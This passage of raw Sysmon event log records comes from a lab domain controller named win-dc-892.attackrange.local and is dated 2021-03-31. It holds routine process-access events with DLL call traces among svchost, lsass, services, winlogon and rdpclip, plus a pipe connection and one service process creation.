12:02:12.011{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1a375|c:\windows\system32\lsm.dll+23fc9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004412Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.011{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23fc1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004411Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.011{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C3-6064-9A00-00000000AE01}3164C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004410Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.011{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C3-6064-9A00-00000000AE01}3164C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004409Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.011{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C3-6064-9A00-00000000AE01}3164C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 18141800x80000000000000004408Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-ConnectPipe2021-03-31 12:02:12.011{266CAFBE-646C-6064-0F00-00000000AE01}1116\TSVCPIPE-b7ec3ca2-9bd6-4c2b-86e9-54daa17e0583C:\Windows\System32\svchost.exe 10341000x80000000000000004407Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.011{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C3-6064-9A00-00000000AE01}3164C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004406Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.011{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C3-6064-9A00-00000000AE01}3164C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004405Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.011{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C3-6064-9A00-00000000AE01}3164C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004404Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.011{266CAFBE-646C-6064-1000-00000000AE01}11242368C:\Windows\system32\svchost.exe{266CAFBE-64C3-6064-9A00-00000000AE01}3164C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004403Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.011{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-64C3-6064-9A00-00000000AE01}3164C:\Windows\System32\rdpclip.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004402Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.011{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C3-6064-9A00-00000000AE01}3164C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|c:\windows\system32\lsm.dll+1cd9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004401Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.011{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C3-6064-9A00-00000000AE01}3164C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1c24|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000004400Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.996{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CCE8A3350FF98FB203519CEC3AE857D8,SHA256=785FF3C1B4C8E837F4255D22E427E7FB94F407C99608DE2734CF0455E6DEB005,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000004399Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.996{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004398Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.996{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004652Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.973{266CAFBE-646A-6064-0A00-00000000AE01}8403012C:\Windows\system32\services.exe{266CAFBE-64C5-6064-A700-00000000AE01}4388C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004651Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.957{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004650Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.957{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004649Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.957{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004648Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.957{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004647Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.957{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-64C5-6064-A700-00000000AE01}4388C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000004646Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.957{266CAFBE-646A-6064-0A00-00000000AE01}8403048C:\Windows\system32\services.exe{266CAFBE-64C5-6064-A700-00000000AE01}4388C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000004645Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.970{266CAFBE-64C5-6064-A700-00000000AE01}4388C:\Windows\System32\svchost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for Windows ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationsvchost.exeC:\Windows\System32\svchost.exe -k AppReadinessC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=36F670D89040709013F6A460176767EC,SHA256=438B6CCD84F4DD32D9684ED7D58FD7D1E5A75FE3F3D12AB6C788E6BB0FFAD5E7,IMPHASH=2CED93915677390B76EE1916B92F3EF6{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000004644Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.957{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004643Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.957{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004642Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.957{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004641Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 